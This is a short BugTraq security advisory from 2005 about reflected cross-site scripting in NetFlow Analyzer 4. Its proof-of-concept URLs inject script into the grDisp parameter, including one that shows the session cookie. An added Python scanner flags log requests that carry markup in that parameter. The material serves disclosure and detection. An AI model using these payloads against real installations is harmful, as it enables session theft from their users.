BugTraq
NetFlow Analyzer 4 XSS Vulnerability
Oct 18 2005 03:37AM
why nsfocus com
NetFlow Analyzer 4
http://manageengine.adventnet.com/products/netflow/
I encountered Cross Site Scripting Vulnerabilities in some files of the NetFlow Analyzer 4; with these files, by sending a specially crafted URL you can execute commands on the client side.
____Proof of Concept______
http://192.168.10.7:8080/netflow/jspui/index.jsp?grID=-1&view=groups&grDisp=<h1>test</h1>
http://192.168.10.7:8080/netflow/jspui/index.jsp?grID=-1&view=groups&grDisp=<script>alert("test")</script>
http://192.168.10.7:8080/netflow/jspui/index.jsp?grID=-1&view=groups&grDisp=<script>alert(document.cookie)</script>
Why, why (at) nsfocus (dot) com [email concealed]
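
An added example, not part of the original post: a log check a defender could run to find requests that put markup into the grDisp parameter of the page named in the proof of concept. The log lines are constructed, and the common/combined access-log format and the ";jsessionid" path suffix are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Path and parameter come from the advisory's proof-of-concept URLs.
TARGET_PATH = "/netflow/jspui/index.jsp"
TARGET_PARAM = "grDisp"
MARKUP = re.compile(r"[<>\"']")  # characters that turn reflected text into markup
# Assumption: common/combined access-log format with a quoted request line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

SAMPLE_LOG = [  # constructed lines, not taken from a real server
    '192.0.2.10 - - [18/Oct/2005:03:40:01 +0000] "GET /netflow/jspui/index.jsp?grID=-1&view=groups&grDisp=10 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [18/Oct/2005:03:41:12 +0000] "GET /netflow/jspui/index.jsp?grID=-1&view=groups&grDisp=%3Ch1%3Etest%3C/h1%3E HTTP/1.1" 200 5143',
    '192.0.2.12 - - [18/Oct/2005:03:42:30 +0000] "GET /netflow/jspui/index.jsp;jsessionid=ABC123?grID=-1&grDisp=%253Cscript%253Ealert(document.cookie)%253C/script%253E HTTP/1.1" 200 5170',
    '192.0.2.13 - - [18/Oct/2005:03:43:02 +0000] "GET /netflow/jspui/other.jsp?grDisp=%3Cb%3E HTTP/1.1" 404 210',
]

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding (e.g. %253C -> %3C -> <)."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_grdisp(log_line):
    """Return the decoded grDisp value if it carries markup, else None."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    # Servlet containers may append ";jsessionid=..." to the path.
    if url.path.split(";")[0] != TARGET_PATH:
        return None
    for raw in parse_qs(url.query, keep_blank_values=True).get(TARGET_PARAM, []):
        value = fully_decode(raw)  # parse_qs already decoded one layer
        if MARKUP.search(value):
            return value
    return None

def scan(lines):
    """Return (line_number, decoded_value) for every flagged request."""
    found = ((n, suspicious_grdisp(line)) for n, line in enumerate(lines, 1))
    return [(n, v) for n, v in found if v is not None]

if __name__ == "__main__":
    for lineno, value in scan(SAMPLE_LOG):
        print(f"line {lineno}: grDisp carries markup: {value!r}")
```
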
Copyright 2010, SecurityFocus